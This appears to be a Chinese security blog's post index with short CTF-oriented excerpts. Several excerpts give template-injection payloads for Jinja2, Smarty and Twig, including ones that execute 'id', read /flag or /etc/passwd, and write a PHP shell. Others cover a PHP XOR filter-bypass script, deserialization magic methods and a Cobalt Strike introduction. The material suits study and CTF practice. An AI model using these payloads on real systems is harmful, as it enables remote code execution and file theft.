php异或和取反脚本
未读异或123456789101112131415161718192021222324<?php$l='';$r='';$argv= str_split("b");//更改里面的值,改为需要的字符for($i=0;$i<count($argv);$i++){ for($j=0;$j<255;$j++) { $k=chr($j)^chr(255); if($k==$argv[$i]) { if($j<16) { $l.="%ff"; $r.="%0".dechex($j); continue; } $l.="%ff"; $r.="%" ...
SSTI-jinjia2
未读判断是否存在1234{%if 条件%}result{%endif%}{%if not a%}yes{%endif%}如果输出yes,则代表有SSTI模板注入漏洞。
利用python模糊测试过滤1234567891011121314151617181920212223242526272829303132333435363738import requestsdef get_file_content(file_path, url): # 初始化一个空字典 dict_list = {} with open(file_path, 'r') as file: for line in file: clean_line = line.strip() if clean_line: payload = """SIAS{{{ ...
SSTI-smarty
未读由于smarty模版设计利用php开发的引擎所以部分人写法和php很类似
12345678910111213141516{if readfile('/flag')}{/if} smarty中的{if}标签中可以执行php语句{$smarty.version} 返回版本信息${smarty.template} 返回当前模板的文件名使用{php}{/php}标签来执行被包裹其中的php指令 3.1版本已经废弃{self::getStreamVariable(“file:///etc/passwd”)}{literal}alert('xss');{/literal}{literal}<script language="php">phpinfo();</script>{/literal ...
Windows如何查看端口是否占用,并结束端口进程一、查看端口是否占用方法1:使用命令提示符(Command Prompt)
123456打开命令提示符: 点击开始菜单,在搜索框中输入“cmd”。 在搜索结果中找到“命令提示符”,右键点击并选择“以管理员身份运行”。输入查看端口占用命令: 在命令提示符窗口中,输入netstat -ano命令并按下回车键。这将显示所有当前的网络连接、监听端口以及它们的进程ID(PID)。 如果要查看特定端口的占用情况,可以使用netstat -ano | findstr "端口号"命令,将“端口号”替换为你想查询的具体端口号。
二、结束占用端口的程序
找到占用端口的程序
如果你已经知道占用端口的程序的名称,可以直接在任务管理器或资源监视器中找到它。
如果不知道程序名称,可以使用命令提示符中的tasklist | findstr "PID"命令来查找,将“PID”替换为占用端口的进程的PID。
Linux关闭占用特定端口的进程1.找到进程 ID (PID):1lsof -i :<p ...
反序列化圣经1234567891011121314151617__construct()//当一个对象创建时被调用__destruct() //当一个对象销毁时被调用__toString() //当一个对象被当作一个字符串使用__sleep()//在对象在被序列化之前运行__wakeup()//将在反序列化之后立即被调用__get()//获得一个对象的成员变量,此处是指别的类__set()//用于将数据写入不可访问的属性__invoke()//这个函数当尝试将对象调用为函数时会触发__call()//当调用一个对象中的不存在的方法的时候就会执行这个函数
[MRCTF2020]Ezpop1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950<?php class Modifier { protected $var; public function append($value){ include($ ...
SSTI-twig
未读容易出现在XFF和session中常用payload
12345678910111213141516171819202122 {{["id"]|map("system")|join(",") {{["id", 0]|sort("system")|join(",")}} {{["id"]|filter("system")|join(",")}} {{[0, 0]|reduce("system", "id")|join(",")}} {{{"<?php phpinfo();":"/var/www/html/shell.ph ...
CS安装教程一、CobalStrike简介 Cobalt Strike(简称为CS)是一款基于java的渗透测试工具,专业的团队作战的渗透测试工具。CS使用了C/S架构,它分为客户端(Client)和服务端(Server),服务端只要一个,客户端可有多个,多人连接服务端后可协同测试,与其他人分享shell。
cs的主要功能是在已经取得攻击目标的控制权后,用于持久化、横向移动、流量隐藏以及数据窃取等操作。
当我们在目标主机上成功执行了 CS 的 payload(有效载荷/攻击模块/攻击方式)后,它会自动的创建一个 Beacon,也就是远程控制木马,然后通过与 C2 服务器建立连接,使攻击者能够远程控制被攻击主机并且获取所需信息。
二、安装地址https://github.com/k8gege/Aggressor/releases/tag/cs
我虚拟机装的是
windows装的是cs4.8
https://blog.csdn.net/m0_60571842/article/details/1329 ...
butterfly美化基础教程
未读
本文参照了Fomalhaut🥝大佬的魔改教程
如有侵权,联系删除
Hexo-butterfly美化基础教程(一)
Hexo-butterfly美化基础教程(二)
Hexo-butterfly魔改教程(一)
Hexo-butterfly魔改教程(二)
Hexo-butterfly魔改教程(三)
0x01前言在我入坑butterfly的时候已经是更新到了4.13.0而网上很多大佬的文章是更适配4.5.0版本的。正如akilar大佬说的butterfly的作者Jerry经常直接修改源码,所以导致了很多魔改出现不适配的情况,但是我不学前端啊所以很多根本看不懂,期待有其他大佬能出最新教程吧!!!
0x02语言修改站点配置文件_config.yml,默认语言是 en 。主题支持三种语言:
default(en)
zh-CN (简体中文)
zh-TW (繁体中文)
0x03网站资料修改网站各种资料,例如标题、副标题和邮箱等个人资料,请修改站点配置文件_config.yml。部分参数如下。
参数
描述
title
网站标题
subtitle
描述
description
...









